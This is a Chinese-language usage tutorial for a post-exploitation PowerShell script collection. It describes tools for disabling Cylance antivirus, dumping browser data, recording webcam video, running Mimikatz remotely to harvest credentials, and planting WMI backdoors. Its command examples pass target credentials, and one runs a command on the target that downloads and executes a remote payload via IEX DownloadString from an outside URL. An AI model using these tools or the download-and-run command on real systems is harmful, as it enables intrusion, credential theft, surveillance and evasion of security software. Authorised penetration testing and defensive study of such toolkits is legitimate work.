RandomPS-Scripts 项目使用教程

1. 项目目录结构及介绍

RandomPS-Scripts 是一个专注于后渗透测试的 PowerShell 脚本集合。项目的目录结构如下：

RandomPS-Scripts/
├── DisableCylance.ps1
├── Get-ChromeDump.ps1
├── Get-DXWebcamVideo.ps1
├── Get-FoxDump.ps1
├── Invoke-ExecuteMSBuild.ps1
├── Invoke-RemoteMimikatz.ps1
├── Invoke-WindowsEnum.ps1
├── Invoke-WmicDriveBy.ps1
├── LICENSE
├── README.md
└── WMIBackdoor.ps1

目录结构介绍

• DisableCylance.ps1: 用于禁用 Cylance 安全软件的脚本。
• Get-ChromeDump.ps1: 用于获取 Chrome 浏览器数据转储的脚本。
• Get-DXWebcamVideo.ps1: 用于从 DirectX 摄像头获取视频的脚本。
• Get-FoxDump.ps1: 用于获取 Firefox 浏览器数据转储的脚本。
• Invoke-ExecuteMSBuild.ps1: 使用 MSBuild 执行 PowerShell 命令的脚本。
• Invoke-RemoteMimikatz.ps1: 在远程主机上执行 Mimikatz 的脚本。
• Invoke-WindowsEnum.ps1: 用于枚举 Windows 系统信息的脚本。
• Invoke-WmicDriveBy.ps1: 使用 WMI 进行远程驱动攻击的脚本。
• LICENSE: 项目的开源许可证文件。
• README.md: 项目的说明文档。
• WMIBackdoor.ps1: 使用 WMI 创建后门的脚本。

2. 项目启动文件介绍

项目中没有明确的“启动文件”，因为每个脚本都是独立的工具，可以根据需要单独运行。以下是一些常用的脚本及其功能介绍：

Invoke-ExecuteMSBuild.ps1

该脚本使用 MSBuild 执行 PowerShell 命令。它可以在本地或远程主机上执行命令，并且支持使用凭据进行身份验证。

使用示例

Invoke-ExecuteMSBuild -ComputerName 'testvm.test.org' -UserName 'Test\Joe' -Password 'Password123'

Invoke-RemoteMimikatz.ps1

该脚本在远程主机上执行 Mimikatz，用于获取系统凭据。

使用示例

Invoke-RemoteMimikatz -ComputerName 'testvm.test.org' -UserName 'Test\Joe' -Password 'Password123'

3. 项目的配置文件介绍

项目中没有明确的配置文件，因为每个脚本都是独立的工具，不需要统一的配置文件。每个脚本通常会接受命令行参数来进行配置。

示例：Invoke-ExecuteMSBuild.ps1 的参数

• ComputerName: 目标主机的 IP 地址或主机名。
• UserName: 用于远程 WMI 命令的用户名。
• Password: 用于远程 WMI 命令的密码。
• FilePath: 目标主机上要复制的 XML 文件路径。
• DriveLetter: 挂载共享时使用的驱动器号。
• Command: 要在目标主机上执行的 PowerShell 命令。

使用示例

Invoke-ExecuteMSBuild -ComputerName 'testvm.test.org' -UserName 'Test\Joe' -Password 'Password123' -FilePath 'C:\Windows\Tasks\pshell.xml' -DriveLetter 'T:' -Command "IEX (New-Object net.webclient).DownloadString('http://www.getyourpowershellhere.com/payload')"

通过以上参数，可以灵活配置脚本的执行行为。

---

以上是 RandomPS-Scripts 项目的基本使用教程，希望对你有所帮助。